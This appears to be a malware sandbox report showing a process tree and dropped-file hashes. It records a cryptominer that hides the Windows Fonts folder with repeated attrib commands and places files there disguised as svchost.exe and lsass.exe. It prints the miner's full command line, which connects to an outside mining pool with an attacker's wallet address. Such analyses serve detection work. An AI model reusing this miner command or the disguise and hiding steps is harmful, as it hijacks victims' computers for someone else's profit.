C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\KvMonXP.exe"KvMonXP.exe" -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbsFilesize
275B
MD54840e58034b78f4d0fa798ac2ffd1d49
SHA16616183e04694bd6680889d897cc4fbc61af0dfc
SHA25697060f6ba35b625b60435fa18f91b755f36d03d8c9140f3ddf24e25bc830f0d9
SHA512fdaec74527bd31d52b489a9ad01826d87d58abfa9575c446a14362b3cd5efad57357ddf539ff98840bd9532e20eb0aef5e0fdf8f8319695ab6591337863d513c
-
C:\Windows\Fonts\KvMonXP.exeFilesize
775KB
MD58a8045c0472e3e90257d51a236ff62dd
SHA12d9cfd9bfe69e7daf9a695df48467d20904157d6
SHA256d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2
SHA5121d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068
-
C:\Windows\Fonts\lsass.exeFilesize
1.4MB
MD5ec0bc41f1e623de85d1be23c55cc5dd8
SHA1d1912bc5d7180b89af68fc7996a943df90b4106a
SHA2560b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981
SHA512ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
\??\c:\windows\Fonts\KvMonXP.exeFilesize
775KB
MD58a8045c0472e3e90257d51a236ff62dd
